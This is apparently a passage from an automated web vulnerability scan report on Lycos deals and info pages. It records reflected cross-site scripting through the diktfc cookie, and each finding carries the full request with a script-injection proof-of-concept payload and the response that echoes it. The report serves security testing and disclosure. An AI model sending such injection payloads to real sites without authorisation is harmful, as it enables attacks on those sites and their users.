Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d333"><script>alert(1)</script>bb3b7fe1ad4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/sony-style-716&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d333"><script>alert(1)</script>bb3b7fe1ad4&amp;cj=1" alt="tracker" />
...[SNIP]...

1.323. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e01"><script>alert(1)</script>b0e1e045cc1 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/walmart-321 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A21e01"><script>alert(1)</script>b0e1e045cc1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/walmart-321&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A21e01"><script>alert(1)</script>b0e1e045cc1&amp;cj=1" alt="tracker" />
...[SNIP]...

1.324. http://deals.lycos.com/deals/stores/walmart-321 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d3eb"%3balert(1)//81b4caeacf4 was submitted in the diktfc cookie. This input was echoed as 9d3eb";alert(1)//81b4caeacf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/walmart-321 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d3eb"%3balert(1)//81b4caeacf4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/walmart-321",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d3eb";alert(1)//81b4caeacf4"
});
</script>
...[SNIP]...

1.325. http://deals.lycos.com/search [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /search

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9bf"%3balert(1)//4aaaae1a092 was submitted in the diktfc cookie. This input was echoed as 7c9bf";alert(1)//4aaaae1a092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c9bf"%3balert(1)//4aaaae1a092; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c9bf";alert(1)//4aaaae1a092"
});
</script>
...[SNIP]...

1.326. http://deals.lycos.com/search [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /search

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1501"><script>alert(1)</script>87fbb33321 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac1501"><script>alert(1)</script>87fbb33321; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac1501"><script>alert(1)</script>87fbb33321&amp;cj=1" alt="tracker" />
...[SNIP]...

1.327. http://deals.lycos.com/sitemap [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /sitemap

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafee"><script>alert(1)</script>fbcae48b9db was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /sitemap HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaafee"><script>alert(1)</script>fbcae48b9db; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/sitemap&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaafee"><script>alert(1)</script>fbcae48b9db&amp;cj=1" alt="tracker" />
...[SNIP]...

1.328. http://deals.lycos.com/sitemap [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /sitemap

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33ede"%3balert(1)//7c98567bc37 was submitted in the diktfc cookie. This input was echoed as 33ede";alert(1)//7c98567bc37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A33ede"%3balert(1)//7c98567bc37; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/sitemap",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A33ede";alert(1)//7c98567bc37"
});
</script>
...[SNIP]...

1.329. http://info.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c5a"><script>alert(1)</script>3400436c004 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63c5a"><script>alert(1)</script>3400436c004; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63c5a"><script>alert(1)</script>3400436c004.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.330. http://info.lycos.com/ [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6579b"%3balert(1)//ffb8b1bf352 was submitted in the diktfc cookie. This input was echoed as 6579b";alert(1)//ffb8b1bf352 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6579b"%3balert(1)//ffb8b1bf352; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6579b";alert(1)//ffb8b1bf352.lycos.com"
});
</script>
...[SNIP]...

1.331. http://info.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3c4"><script>alert(1)</script>85e243e865f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bootstrap.js HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb3c4"><script>alert(1)</script>85e243e865f; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/index.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb3c4"><script>alert(1)</script>85e243e865f.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.332. http://info.lycos.com/bootstrap.js [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /bootstrap.js

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab342"%3balert(1)//c4c4ec323f6 was submitted in the diktfc cookie. This input was echoed as ab342";alert(1)//c4c4ec323f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bootstrap.js HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aab342"%3balert(1)//c4c4ec323f6; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"info.lycos.com/index.php",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aab342";alert(1)//c4c4ec323f6.lycos.com"
});
</script>
...[SNIP]...

1.333. http://info.lycos.com/contact.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /contact.php

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de0ae"><script>alert(1)</script>80df0ab27b8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ade0ae"><script>alert(1)</script>80df0ab27b8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Cont
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=info.lycos.com/contact.php&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ade0ae"><script>alert(1)</script>80df0ab27b8.lycos.com&amp;cj=1" alt="tracker" />
...[SNIP]...

1.334. http://info.lycos.com/contact.php [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /contact.php

Issue detail

